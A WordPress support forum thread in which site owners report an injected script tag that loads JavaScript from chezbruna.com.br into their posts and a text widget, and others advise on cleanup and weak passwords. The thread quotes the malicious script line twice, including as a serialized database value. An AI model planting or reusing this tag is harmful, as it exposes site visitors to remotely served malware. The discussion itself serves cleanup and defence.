WordPress.org

Support

Support » How-To and Troubleshooting » [Resolved] Unwanted java scripts added to posts

[Resolved] Unwanted java scripts added to posts

  • For the past week I receive warnings on a site I have been running for over a year.
    When visiting the site, in chrome, it’s promts me that ‘java needs my permission to run’
    Thereafter, I receive a security warning : “The application’s digital signature cannot be verified. Do you want to run the application?’

    When logging into the dashboard, some of my posts had unwanted scripts in the Header :
    <script type="text/javascript" src="http://chezbruna.com.br/imagens/rebots.php"></script>

    I removed the unwanted scripts from the posts, but I still get the prompts and warnings – what do I do next?

Viewing 9 replies - 1 through 9 (of 9 total)
  • Sounds like you’ve been hacked.

    FAQ: My Site Was Hacked

    That chezbruna site is not a WordPress site, so I am guessing that isn’t your domain?

    Same problem here, just a few hours ago this thing ‘started’ on my site too: alaputacalle.com

    Yes. I already been there before coming here. Still, it puzzles me how they have done it. So far, templates are clean, and php files are clean. That Iframe that appears on my template… is somehow inserted vía javascript or something.

    My knowledge is quite limited!

    So far ran three diferent antivirus plugins, no luck finding ‘the sting’. It may be on the MySQL database…

    It was there indeed… I found it on wp_options as a text widget.

    a:2:{i:3;a:3:{s:5:”title”;s:2:”
    “;s:4:”text”;s:91:”<script type=”text/javascript” src=”http://chezbruna.com.br/imagens/rebots.php”></script>
    “;s:6:”filter”;b:0;}s:12:”_multiwidget”;i:1;}

    I couldn’t figure out how they were loading that text widget on my theme yet.

    I also found all mine (I hope).

    Most were just added to my post headings, but found a sneaky one in a text widget.
    I am changing my passwords all over just to be a little more protected.

    Finding the symptom, the script that was output, does not mean that you have found the problem. Something on your sites is vulnerable. Removing the nasty Javascript doesn’t remove the vulnerability that let the code get put on the site in the first place. Please follow all of the instructions in the Hacked Faq– FAQ: My Site Was Hacked

    My site was affected too – it started last night.
    It’s a huge coincidence that all are affected by the same injection – maybe a vulnerability in WP?

    Hi,

    I had the same issues, than I installed a login log plugin (I used this, http://wordpress.org/extend/plugins/simple-login-log/ ) and found that one of site administrators logged in from different places in the world (the plugin shows the IP)…

    I asked him which was his password, and it was extremely weak!
    So, as told me by our provider, the problem could be a too week login password.

    Oh, I mentioned that plugin ONLY because I used that, I have nothing to share with it or its author 😉

    Hope this helps
    Alessandro

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘[Resolved] Unwanted java scripts added to posts’ is closed to new replies.
Skip to toolbar